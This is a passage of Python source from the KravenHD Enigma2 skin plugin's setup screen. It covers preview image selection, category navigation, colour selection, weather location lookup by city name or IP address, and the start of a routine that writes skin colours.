\"texture\":\n\t\t\t\tself.makeTexturePreview(config.plugins.KravenHD.BackgroundTexture.value)\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.BackgroundTexture:\n\t\t\t\tself.makeTexturePreview(returnValue)\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.InfobarTexture:\n\t\t\t\tself.makePreview()\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.BackgroundAlternateListColor:\n\t\t\t\tself.makeAlternatePreview(config.plugins.KravenHD.BackgroundTexture.value, config.plugins.KravenHD.BackgroundAlternateColor.value)\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.InfobarAlternateListColor:\n\t\t\t\tself.makeAlternatePreview(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarAlternateColor.value)\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.IBStyle:\n\t\t\t\tself.makePreview()\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.IBLineList:\n\t\t\t\tself.makePreview()\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.InfobarGradientListColor:\n\t\t\t\tself.makePreview()\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.InfobarBoxListColor:\n\t\t\t\tself.makePreview()\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif optionValue in (config.plugins.KravenHD.InfobarGradientListColorPrimary, config.plugins.KravenHD.InfobarGradientListColorSecondary):\n\t\t\t\tself.makePreview()\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\"\n\t\t\telif returnValue in (\"about\", \"about2\"):\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/about.png\"\n\t\t\telif returnValue == (\"meteo-light\"):\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/meteo.jpg\"\n\t\t\telif returnValue == \"progress\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/colorfull.jpg\"\n\t\t\telif returnValue in (\"self\", config.plugins.KravenHD.PermanentClock.value):\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/colors.jpg\"\n\t\t\telif returnValue == (\"channelselection-style-minitv3\"):\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/channelselection-style-minitv.jpg\"\n\t\t\telif returnValue == \"channelselection-style-nobile-minitv3\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/channelselection-style-nobile-minitv.jpg\"\n\t\t\telif returnValue == \"all-screens\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/emc-smallcover.jpg\"\n\t\t\telif returnValue == \"player-classic\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/clock-classic.jpg\"\n\t\t\telif returnValue == \"player-android\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/clock-android.jpg\"\n\t\t\telif returnValue == \"player-flip\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/clock-flip.jpg\"\n\t\t\telif returnValue == \"player-weather\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/clock-weather.jpg\"\n\t\t\telif returnValue == \"box\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/2.jpg\"\n\t\t\telif returnValue == \"grad\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/infobar-style-x2.jpg\"\n\t\t\telif returnValue == \"only-infobar\":\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/infobar-style-x3.jpg\"\n\t\t\telif returnValue in (\"0C\", \"18\", \"32\", \"58\", \"7E\"):\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/transparent.jpg\"\n\t\t\telif optionValue == config.plugins.KravenHD.KravenIconVPosition:\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/vposition.jpg\"\n\t\t\telif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/\" + returnValue + \".jpg\"):\n\t\t\t\tpath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/\" + returnValue + \".jpg\"\n\t\t\tif fileExists(path):\n\t\t\t\treturn path\n\t\t\telse:\n\t\t\t\treturn \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/black.jpg\"\n\t\texcept:\n\t\t\treturn \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/fb.jpg\"\n\n\tdef UpdatePicture(self):\n\t\tself.PicLoad.PictureData.get().append(self.DecodePicture)\n\t\tself.onLayoutFinish.append(self.ShowPicture)\n\n\tdef ShowPicture(self):\n\t\tself.PicLoad.setPara([self[\"helperimage\"].instance.size().width(), self[\"helperimage\"].instance.size().height(), self.Scale[0], self.Scale[1], 0, 1, \"#00000000\"])\n\t\tif self.picPath is not None:\n\t\t\tself.picPath = None\n\t\t\tself.PicLoad.startDecode(self.picPath)\n\t\telse:\n\t\t\tself.PicLoad.startDecode(self.GetPicturePath())\n\n\tdef DecodePicture(self, PicInfo = \"\"):\n\t\tptr = self.PicLoad.getData()\n\t\tself[\"helperimage\"].instance.setPixmap(ptr)\n\n\tdef keyLeft(self):\n\t\tConfigListScreen.keyLeft(self)\n\t\tself.mylist()\n\n\tdef keyRight(self):\n\t\tConfigListScreen.keyRight(self)\n\t\tself.mylist()\n\n\tdef keyDown(self):\n\t\tself[\"config\"].instance.moveSelection(self[\"config\"].instance.moveDown)\n\t\tself.mylist()\n\n\tdef keyUp(self):\n\t\tself[\"config\"].instance.moveSelection(self[\"config\"].instance.moveUp)\n\t\tself.mylist()\n\n\tdef keyUpLong(self):\n\t\tself[\"config\"].instance.moveSelection(self[\"config\"].instance.moveUp)\n\t\tself.mylist()\n\n\tdef keyDownLong(self):\n\t\tself[\"config\"].instance.moveSelection(self[\"config\"].instance.moveDown)\n\t\tself.mylist()\n\n\tdef pageUp(self):\n\t\tself[\"config\"].instance.moveSelection(self[\"config\"].instance.pageUp)\n\t\tself.mylist()\n\n\tdef pageDown(self):\n\t\tself[\"config\"].instance.moveSelection(self[\"config\"].instance.pageDown)\n\t\tself.mylist()\n\n\tdef categoryDown(self):\n\t\tposition = self[\"config\"].instance.getCurrentIndex()\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif position == 0: # about\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(163)\n\t\telse:\n\t\t\tif position == 0: # about\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(168)\n\t\tif (2 <= position <= 4): # profiles\n\t\t\tself[\"config\"].instance.moveSelectionTo(0)\n\t\tif (6 <= position <= 17): # system\n\t\t\tself[\"config\"].instance.moveSelectionTo(3)\n\t\tif (18 <= position <= 35): # global colors\n\t\t\tself[\"config\"].instance.moveSelectionTo(7)\n\t\tif (36 <= position <= 53): # infobar-look\n\t\t\tself[\"config\"].instance.moveSelectionTo(19)\n\t\tif (54 <= position <= 64): # infobar-contents\n\t\t\tself[\"config\"].instance.moveSelectionTo(37)\n\t\tif (72 <= position <= 81): # weather\n\t\t\tself[\"config\"].instance.moveSelectionTo(55)\n\t\tif (83 <= position <= 85): # clock\n\t\t\tself[\"config\"].instance.moveSelectionTo(73)\n\t\tif (90 <= position <= 94): # ecm infos\n\t\t\tself[\"config\"].instance.moveSelectionTo(84)\n\t\tif (96 <= position <= 107): # views\n\t\t\tself[\"config\"].instance.moveSelectionTo(91)\n\t\tif (108 <= position <= 116): # channellist\n\t\t\tself[\"config\"].instance.moveSelectionTo(97)\n\t\tif (122 <= position <= 124): # numberzap\n\t\t\tself[\"config\"].instance.moveSelectionTo(109)\n\t\tif (126 <= position <= 133): # graphicalepg\n\t\t\tself[\"config\"].instance.moveSelectionTo(123)\n\t\tif (135 <= position <= 143): # emc\n\t\t\tself[\"config\"].instance.moveSelectionTo(127)\n\t\tif (144 <= position <= 147): # player\n\t\t\tself[\"config\"].instance.moveSelectionTo(136)\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif (149 <= position <= 151): # various\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(145)\n\t\telse:\n\t\t\tif (149 <= position <= 152): # antialiasing\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(145)\n\t\t\tif (154 <= position <= 156): # various\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(150)\n\t\tself.mylist()\n\n\tdef categoryUp(self):\n\t\tposition = self[\"config\"].instance.getCurrentIndex()\n\t\tif position == 0: # about\n\t\t\tself[\"config\"].instance.moveSelectionTo(3)\n\t\tif (2 <= position <= 4): # profiles\n\t\t\tself[\"config\"].instance.moveSelectionTo(7)\n\t\tif (6 <= position <= 17): # system\n\t\t\tself[\"config\"].instance.moveSelectionTo(19)\n\t\tif (18 <= position <= 35): # global colors\n\t\t\tself[\"config\"].instance.moveSelectionTo(37)\n\t\tif (36 <= position <= 53): # infobar-look\n\t\t\tself[\"config\"].instance.moveSelectionTo(55)\n\t\tif (54 <= position <= 64): # infobar-contents\n\t\t\tself[\"config\"].instance.moveSelectionTo(73)\n\t\tif (72 <= position <= 81): # weather\n\t\t\tself[\"config\"].instance.moveSelectionTo(84)\n\t\tif (83 <= position <= 85): # clock\n\t\t\tself[\"config\"].instance.moveSelectionTo(91)\n\t\tif (90 <= position <= 94): # ecm infos\n\t\t\tself[\"config\"].instance.moveSelectionTo(97)\n\t\tif (96 <= position <= 107): # views\n\t\t\tself[\"config\"].instance.moveSelectionTo(109)\n\t\tif (108 <= position <= 116): # channellist\n\t\t\tself[\"config\"].instance.moveSelectionTo(123)\n\t\tif (122 <= position <= 124): # numberzap\n\t\t\tself[\"config\"].instance.moveSelectionTo(127)\n\t\tif (126 <= position <= 133): # graphicalepg\n\t\t\tself[\"config\"].instance.moveSelectionTo(136)\n\t\tif (135 <= position <= 143): # emc\n\t\t\tself[\"config\"].instance.moveSelectionTo(145)\n\t\tif (144 <= position <= 147): # player\n\t\t\tself[\"config\"].instance.moveSelectionTo(150)\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif (149 <= position <= 151): # various\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(0)\n\t\telse:\n\t\t\tif (149 <= position <= 152): # antialiasing\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(155)\n\t\t\tif (154 <= position <= 156): # various\n\t\t\t\tself[\"config\"].instance.moveSelectionTo(0)\n\t\tself.mylist()\n\n\tdef redbutton(self):\n\t\toption = self[\"config\"].getCurrent()[1]\n\t\tif option in (config.plugins.KravenHD.msn_searchby, config.plugins.KravenHD.msn_cityname, config.plugins.KravenHD.msn_code):\n\t\t\tself.checkCode()\n\t\telse:\n\t\t\tself.faq()\n\n\tdef getCityByIP(self):\n\t\ttry:\n\t\t\tres_city = requests.get('http://ip-api.com/json/?lang=de&fields=status,city', timeout=1)\n\t\t\tdata_city = res_city.json()\n\t\t\tif data_city['status'] == 'success':\n\t\t\t\treturn str(data_city['city'])\n\t\texcept:\n\t\t\tself.session.open(MessageBox, _('No valid location found.'), MessageBox.TYPE_INFO, timeout = 10)\n\n\tdef checkCode(self):\n\t\tif self.InternetAvailable:\n\t\t\toption = self[\"config\"].getCurrent()[1]\n\t\t\tif option.value == \"auto-ip\":\n\t\t\t\tcityip = self.getCityByIP()\n\t\t\t\tiplist = []\n\t\t\t\ttry:\n\t\t\t\t\tres_gc = requests.get('http://weather.service.msn.com/find.aspx?src=windows&outputview=search&weasearchstr=' + str(cityip) + '&culture=' + str(config.plugins.KravenHD.msn_language.value), timeout=1)\n\t\t\t\t\tdata_gc = fromstring(res_gc.text)\n\n\t\t\t\t\tfor weather in data_gc.findall(\"./weather\"):\n\t\t\t\t\t\tipcity = weather.get('weatherlocationname').encode(\"utf-8\", 'ignore')\n\t\t\t\t\t\tweathercode = weather.get('weatherlocationcode')\n\t\t\t\t\t\tiplist.append((ipcity, weathercode + \"//\" + ipcity))\n\n\t\t\t\t\tdef WeatherCodeCallBack(callback):\n\t\t\t\t\t\tcallback = callback and callback[1]\n\t\t\t\t\t\tif callback:\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_code.value = str(callback.split(\"//\")[0])\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_code.save()\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_cityfound.value = str(callback.split(\"//\")[1].split(\",\")[0])\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_cityfound.save()\n\t\t\t\t\t\t\tself.session.open(MessageBox, _(\"Weather-Code found:\\n\") + str(callback.split(\"//\")[0]), MessageBox.TYPE_INFO, timeout = 10)\n\t\t\t\t\t\tself.showPreview()\n\t\t\t\t\tself.session.openWithCallback(WeatherCodeCallBack, ChoiceBox, title = _(\"Choose your location:\"), list = iplist)\n\n\t\t\t\texcept:\n\t\t\t\t\tself.session.open(MessageBox, _('No valid location found.'), MessageBox.TYPE_INFO, timeout = 10)\n\n\t\t\tif option.value == \"location\" or option == config.plugins.KravenHD.msn_cityname:\n\t\t\t\tcitylist = []\n\t\t\t\ttry:\n\t\t\t\t\tres_gc = requests.get('http://weather.service.msn.com/find.aspx?src=windows&outputview=search&weasearchstr=' + str(config.plugins.KravenHD.msn_cityname.value) + '&culture=' + str(config.plugins.KravenHD.msn_language.value), timeout=1)\n\t\t\t\t\tdata_gc = fromstring(res_gc.text)\n\n\t\t\t\t\tfor weather in data_gc.findall(\"./weather\"):\n\t\t\t\t\t\tcity = weather.get('weatherlocationname').encode(\"utf-8\", 'ignore')\n\t\t\t\t\t\tcode = weather.get('weatherlocationcode')\n\t\t\t\t\t\tcitylist.append((city, code + \"//\" + city))\n\n\t\t\t\t\tdef LocationCallBack(callback):\n\t\t\t\t\t\tcallback = callback and callback[1]\n\t\t\t\t\t\tif callback:\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_code.value = str(callback.split(\"//\")[0])\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_code.save()\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_cityfound.value = str(callback.split(\"//\")[1].split(\",\")[0])\n\t\t\t\t\t\t\tconfig.plugins.KravenHD.msn_cityfound.save()\n\t\t\t\t\t\t\tself.session.open(MessageBox, _(\"Weather-Code found:\\n\") + str(callback.split(\"//\")[0]), MessageBox.TYPE_INFO, timeout = 10)\n\t\t\t\t\t\tself.showPreview()\n\t\t\t\t\tself.session.openWithCallback(LocationCallBack, ChoiceBox, title = _(\"Choose your location:\"), list = citylist)\n\n\t\t\t\texcept:\n\t\t\t\t\tself.session.open(MessageBox, _('No valid Weather-Code found.'), MessageBox.TYPE_INFO, timeout = 10)\n\n\tdef VirtualKeyBoardCallBack(self, callback):\n\t\ttry:\n\t\t\tif callback: \n\t\t\t\tself[\"config\"].getCurrent()[1].value = callback\n\t\t\telse:\n\t\t\t\tpass\n\t\texcept:\n\t\t\tpass\n\n\tdef ColorSelectionCallBack(self, callback):\n\t\ttry:\n\t\t\tif callback:\n\t\t\t\tself.actSelfColorSelection.value = callback\n\t\t\t\tself.actListColorSelection.value = \"self\"\n\t\t\t\tself.mylist()\n\t\t\telse:\n\t\t\t\tpass\n\t\texcept:\n\t\t\tpass\n\n\tdef OK(self):\n\t\toption = self[\"config\"].getCurrent()[1]\n\t\toptionislistcolor=False\n\n\t\tif option == config.plugins.KravenHD.BackgroundListColor:\n\t\t\tif not config.plugins.KravenHD.BackgroundListColor.value in (\"gradient\", \"texture\"):\n\t\t\t\toptionislistcolor=True\n\t\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.BackgroundSelfColor\n\t\telif option == config.plugins.KravenHD.InfobarBoxListColor:\n\t\t\tif not config.plugins.KravenHD.InfobarBoxListColor.value in (\"gradient\", \"texture\"):\n\t\t\t\toptionislistcolor=True\n\t\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.InfobarBoxSelfColor\n\t\telif option == config.plugins.KravenHD.InfobarGradientListColor:\n\t\t\tif not config.plugins.KravenHD.InfobarGradientListColor.value == \"texture\":\n\t\t\t\toptionislistcolor=True\n\t\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.InfobarGradientSelfColor\n\t\telif option == config.plugins.KravenHD.SelectionBackgroundList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.SelectionBackgroundSelf\n\t\telif option == config.plugins.KravenHD.SelectionBackground2List:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.SelectionBackground2Self\n\t\telif option == config.plugins.KravenHD.SelectionBorderList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.SelectionBorderSelf\n\t\telif option == config.plugins.KravenHD.IBProgressList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.IBProgressSelf\n\t\telif option == config.plugins.KravenHD.IBProgressBackgroundList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.IBProgressBackgroundSelf\n\t\telif option == config.plugins.KravenHD.IBProgressBorderLineColorList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.IBProgressBorderLineColorSelf\n\t\telif option == config.plugins.KravenHD.Font1List:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.Font1Self\n\t\telif option == config.plugins.KravenHD.Font2List:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.Font2Self\n\t\telif option == config.plugins.KravenHD.IBFont1List:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.IBFont1Self\n\t\telif option == config.plugins.KravenHD.IBFont2List:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.IBFont2Self\n\t\telif option == config.plugins.KravenHD.BackgroundGradientListColorPrimary:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.BackgroundGradientSelfColorPrimary\n\t\telif option == config.plugins.KravenHD.BackgroundGradientListColorSecondary:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.BackgroundGradientSelfColorSecondary\n\t\telif option == config.plugins.KravenHD.InfobarGradientListColorPrimary:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.InfobarGradientSelfColorPrimary\n\t\telif option == config.plugins.KravenHD.InfobarGradientListColorSecondary:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.InfobarGradientSelfColorSecondary\n\t\telif option == config.plugins.KravenHD.BackgroundAlternateListColor:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.BackgroundAlternateSelfColor\n\t\telif option == config.plugins.KravenHD.InfobarAlternateListColor:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.InfobarAlternateSelfColor\n\t\telif option == config.plugins.KravenHD.MarkedFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.MarkedFontSelf\n\t\telif option == config.plugins.KravenHD.PermanentClockFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.PermanentClockFontSelf\n\t\telif option == config.plugins.KravenHD.SelectionFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.SelectionFontSelf\n\t\telif option == config.plugins.KravenHD.ECMFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.ECMFontSelf\n\t\telif option == config.plugins.KravenHD.ChannelnameFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.ChannelnameFontSelf\n\t\telif option == config.plugins.KravenHD.PrimetimeFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.PrimetimeFontSelf\n\t\telif option == config.plugins.KravenHD.ButtonTextList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.ButtonTextSelf\n\t\telif option == config.plugins.KravenHD.AndroidList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.AndroidSelf\n\t\telif option == config.plugins.KravenHD.BorderList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.BorderSelf\n\t\telif option == config.plugins.KravenHD.ProgressList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.ProgressSelf\n\t\telif option == config.plugins.KravenHD.LineList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.LineSelf\n\t\telif option == config.plugins.KravenHD.IBLineList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.IBLineSelf\n\t\telif option == config.plugins.KravenHD.MiniTVBorderList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.MiniTVBorderSelf\n\t\telif option == config.plugins.KravenHD.AnalogColorList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.AnalogColorSelf\n\t\telif option == config.plugins.KravenHD.ChannelSelectionServiceNAList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.ChannelSelectionServiceNASelf\n\t\telif option == config.plugins.KravenHD.NZBorderList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.NZBorderSelf\n\t\telif option == config.plugins.KravenHD.GMESelFgList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.GMESelFgSelf\n\t\telif option == config.plugins.KravenHD.GMESelBgList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.GMESelBgSelf\n\t\telif option == config.plugins.KravenHD.GMENowFgList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.GMENowFgSelf\n\t\telif option == config.plugins.KravenHD.GMENowBgList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.GMENowBgSelf\n\t\telif option == config.plugins.KravenHD.GMEBorderList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.GMEBorderSelf\n\t\telif option == config.plugins.KravenHD.EMCSelectionBackgroundList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.EMCSelectionBackgroundSelf\n\t\telif option == config.plugins.KravenHD.EMCSelectionFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.EMCSelectionFontSelf\n\t\telif option == config.plugins.KravenHD.Android2List:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.Android2Self\n\t\telif option == config.plugins.KravenHD.UnwatchedColorList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.UnwatchedColorSelf\n\t\telif option == config.plugins.KravenHD.WatchingColorList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.WatchingColorSelf\n\t\telif option == config.plugins.KravenHD.FinishedColorList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.FinishedColorSelf\n\t\telif option == config.plugins.KravenHD.TunerBusyList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.TunerBusySelf\n\t\telif option == config.plugins.KravenHD.TunerLiveList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.TunerLiveSelf\n\t\telif option == config.plugins.KravenHD.TunerRecordList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.TunerRecordSelf\n\t\telif option == config.plugins.KravenHD.TunerXtremeBusyList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.TunerXtremeBusySelf\n\t\telif option == config.plugins.KravenHD.MainmenuHorTitleFontList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.MainmenuHorTitleFontSelf\n\t\telif option == config.plugins.KravenHD.MainmenuHorIconColorList:\n\t\t\toptionislistcolor=True\n\t\t\tself.actSelfColorSelection = config.plugins.KravenHD.MainmenuHorIconColorSelf\n\n\t\tif optionislistcolor:\n\t\t\tself.actListColorSelection=option\n\t\t\ttitle = _(\"Use the sliders to define your color:\")\n\t\t\tif self.actListColorSelection.value==\"self\":\n\t\t\t\tcolor = self.actSelfColorSelection.value\n\t\t\telif self.actListColorSelection.value==\"none\":\n\t\t\t\tcolor = \"000000\"\n\t\t\telif self.actListColorSelection.value == \"progress\":\n\t\t\t\tcolor = \"C3461B\"\n\t\t\telse:\n\t\t\t\tcolor = self.actListColorSelection.value\n\t\t\tself.session.openWithCallback(self.ColorSelectionCallBack, KravenHDColorSelection, title = title, color = color)\n\t\telif option == config.plugins.KravenHD.msn_cityname:\n\t\t\ttext = self[\"config\"].getCurrent()[1].value\n\t\t\ttitle = _(\"Enter your location:\")\n\t\t\tself.session.openWithCallback(self.VirtualKeyBoardCallBack, VirtualKeyBoard, title = title, text = text)\n\t\t\tconfig.plugins.KravenHD.msn_cityname.save()\n\t\telif option == config.plugins.KravenHD.customProfile:\n\t\t\tself.saveProfile(msg=True)\n\t\telif option == config.plugins.KravenHD.defaultProfile:\n\t\t\tself.reset()\n\n\tdef faq(self):\n\t\tfrom Plugins.SystemPlugins.MPHelp import PluginHelp, XMLHelpReader\n\t\treader = XMLHelpReader(resolveFilename(SCOPE_PLUGINS, \"Extensions/KravenHD/faq.xml\"))\n\t\tKravenHDFaq = PluginHelp(*reader)\n\t\tKravenHDFaq.open(self.session)\n\n\tdef reboot(self):\n\t\trestartbox = self.session.openWithCallback(self.restartGUI, MessageBox, _(\"Do you really want to reboot now?\"), MessageBox.TYPE_YESNO)\n\t\trestartbox.setTitle(_(\"Restart GUI\"))\n\n\tdef getDataByKey(self, list, key):\n\t\tfor item in list:\n\t\t\tif item[\"key\"] == key:\n\t\t\t\treturn item\n\t\treturn list[0]\n\n\tdef getFontStyleData(self, key):\n\t\treturn self.getDataByKey(channelselFontStyles, key)\n\n\tdef getFontSizeData(self, key):\n\t\treturn self.getDataByKey(channelInfoFontSizes, key)\n\n\tdef save(self, answer=True):\n\t\tself.saveProfile(msg=False)\n\t\tfor x in self[\"config\"].list:\n\t\t\tif len(x) > 1:\n\t\t\t\tx[1].save()\n\t\t\telse:\n\t\t\t\tpass\n\n\t\tself.skinSearchAndReplace = []\n\n\t\t### Background (global)\n\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg\" value=\"#00000000', 'name=\"Kravenbg\" value=\"#' + config.plugins.KravenHD.BackgroundColorTrans.value + self.skincolorbackgroundcolor])\n\n\t\t### Background2 (non-transparent)\n\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg2\" value=\"#00000000', 'name=\"Kravenbg2\" value=\"#00' + self.skincolorbackgroundcolor])\n\t\tself.skinSearchAndReplace.append(['name=\"background\" value=\"#00000000', 'name=\"background\" value=\"#00' + self.skincolorbackgroundcolor])\n\n\t\t### Background3 (Menus Transparency)\n\t\tif self.actMenustyle in (\"logo\", \"metrix-icons\"):\n\t\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg3\" value=\"#00000000', 'name=\"Kravenbg3\" value=\"#' + config.plugins.KravenHD.BackgroundColorTrans.value + self.skincolorbackgroundcolor])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg3\" value=\"#00000000', 'name=\"Kravenbg3\" value=\"#00' + self.skincolorbackgroundcolor])\n\n\t\t### Background4 (Channellist)\n\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg4\" value=\"#00000000', 'name=\"Kravenbg4\" value=\"#' + config.plugins.KravenHD.ChannelSelectionTrans.value + self.skincolorbackgroundcolor])\n\n\t\t### Background5 (Radio Channellist, 